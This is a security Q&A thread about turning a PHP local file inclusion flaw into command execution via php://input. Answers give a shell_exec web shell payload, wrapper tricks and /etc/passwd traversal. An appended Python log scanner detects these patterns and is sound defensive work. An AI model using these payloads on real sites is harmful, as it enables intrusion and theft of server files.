
TLDR: Trying to execute commands on a site that's got an LFI vuln.

So I am making my POST request to my vulnerable site and

import requests

header = {
    'User-Agent': 'Mozilla/5.0 (Windows; U; Windows NT 6.1; rv:2.2) Gecko/20110201',
    'Accept-Language': 'en-US;',
    'Accept-Encoding': 'gzip, deflate',
    'Accept': 'text/html,application/xhtml+xml,application/xml;',
    'Connection': 'close'
}

command = "<? system(\"echo does this work\");?>"
requests.post("https://www.vulnsite.com/pog=php://input", headers=header, data=command)

Then, if I look at the actual response, it returns: <? system("echo does this work");?>

Why isn't it returning "does this work"? How can I get it to execute actual commands? What am I doing wrong?

RFIx
  • 21
  • 2

4 Answers

0

Maybe your syntax isn't correct inside the system function, and the error output isn't printed. Try your request in the web browser by using the source view mode with Ctrl+U.

The system function should be called like this:

<?php system(\"echo 'does this work'\");?>
kikos897
  • 1
  • 2
  • Tried that before, doesn't work :/ Also played around with different modifications of this. Thanks tho – RFIx Jan 18 '21 at 05:04
0

There is a problem with the way you crafted the request using the PHP wrapper; it should be: requests.post("https://www.vulnsite.com?pog=php://input", headers=header, data=command). Note that you are using a POST request to send the data to the server, so you should have a way to access that data. The complete request should be like this:

command = "<?php echo shell_exec($_GET['cmd']); ?>"

requests.post("https://www.vulnsite.com?pog=php://input&cmd=whoami", headers=header, data=command)

Also, I would recommend that you intercept the request while sending it, using a proxy tool like Burp or one of your choice.

ifexploit
  • 2,499
  • 1
  • 14
  • 12
0

Not every LFI is automatically RCE; it depends on the specific target. Did you already verify that you got RCE (for example using Burp or similar)?

If so, you may also need to invoke your code after inserting it. I would try calling the URL of the injected script via browser or code and look at the result of this request.

nomiko
  • 11
  • 2
0

It appears that the stream (php://input) is being read via some file operation like file_get_contents(), not run via an include() or require() function, which would evaluate the code. Hence you are seeing the code reflected back, as opposed to the output of executed code.

You might be able to leverage a different stream handler like expect:// or phar:// to achieve code execution. Additionally, the code which reads php://input is likely to allow traversal when reading files, so you can probably read other files like ../../../../../../../etc/passwd or the PHP files on the server, which may allow you to identify additional vulnerabilities such as SQL injection.

wireghoul
  • 5,745
  • 2
  • 17
  • 26
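The two points made by ifexploit and wireghoul above (the parameter in the question never reaches the query string, and a file parameter that accepts php://, expect:// or phar:// wrappers or ../ sequences is worth investigating) map directly onto what a defender should be watching for in access logs. Below is an added example, not part of the original post or any of the answers, that parses constructed combined-format log lines and flags request targets whose query parameters carry a stream wrapper or traversal sequence, and separately notes the question's request shape where the parameter sits in the path instead of the query string. The log lines, the wrapper list and the two regular expressions are assumptions made for the demonstration, not a complete rule set.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Combined-log-format line; only the client, method, target and status are used.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Stream wrappers that turn a local-file read or include into something else.
# This list is an assumption for the example (the answers mention php://,
# expect:// and phar://); extend it to fit your own environment.
WRAPPER_RE = re.compile(r'(php|expect|phar|data)://', re.I)
# "../" in plain, backslash and still-percent-encoded form. parse_qsl decodes
# once, so a double-encoded %252e%252e arrives here as %2e%2e.
TRAVERSAL_RE = re.compile(r'(\.\./|\.\.\\|%2e%2e)', re.I)


def inspect_target(target):
    """Return the findings for one request target (path plus query string)."""
    findings = []
    parts = urlsplit(target)
    # parse_qsl percent-decodes the values; keep_blank_values keeps
    # parameters such as "cmd=" that carry no value.
    params = parse_qsl(parts.query, keep_blank_values=True)
    if not params and "=" in parts.path:
        # The request in the question has "pog=php://input" in the path with
        # no "?", so the application never sees a parameter named pog at all.
        findings.append("parameter-in-path")
    for name, value in params:
        if WRAPPER_RE.match(value):
            findings.append("wrapper:" + name)
        if TRAVERSAL_RE.search(value):
            findings.append("traversal:" + name)
    path = unquote(parts.path)
    if TRAVERSAL_RE.search(path):
        findings.append("traversal:path")
    if WRAPPER_RE.search(path):
        findings.append("wrapper:path")
    return findings


def scan_log(lines):
    """Return (ip, method, target, status, findings) for suspicious lines only."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        findings = inspect_target(m["target"])
        if findings:
            hits.append((m["ip"], m["method"], m["target"], m["status"], findings))
    return hits


# Constructed sample log lines (not real traffic). The second and third mirror
# the request shapes discussed in the question and in ifexploit's answer.
SAMPLE_LOG = [
    '10.0.0.5 - - [18/Jan/2021:05:04:00 +0000] "GET /index.php?pog=home HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.7 - - [18/Jan/2021:05:04:01 +0000] "POST /pog=php://input HTTP/1.1" 404 200 "-" "Mozilla/5.0"',
    '10.0.0.7 - - [18/Jan/2021:05:04:02 +0000] "POST /?pog=php://input&cmd=whoami HTTP/1.1" 200 37 "-" "Mozilla/5.0"',
    '10.0.0.7 - - [18/Jan/2021:05:04:03 +0000] "GET /?pog=../../../../etc/passwd HTTP/1.1" 200 1910 "-" "Mozilla/5.0"',
    '10.0.0.7 - - [18/Jan/2021:05:04:04 +0000] "GET /?pog=expect%3A%2F%2Ftest HTTP/1.1" 500 0 "-" "Mozilla/5.0"',
    '10.0.0.7 - - [18/Jan/2021:05:04:05 +0000] "GET /?pog=%252e%252e%252fetc%252fpasswd HTTP/1.1" 200 1910 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, method, target, status, findings in scan_log(SAMPLE_LOG):
        print(f"{ip} {method} {target} -> {status} {', '.join(findings)}")
```

The "parameter-in-path" finding is there for triage rather than alerting: a request like the one in the question reaches the application as a path, which is why the server in the question could only ever reflect the body back. The wrapper and traversal checks run on the decoded query values and once more on the path so that a single layer of percent-encoding does not hide them; a second layer still shows up because the %2e%2e alternative in TRAVERSAL_RE matches the partially decoded form.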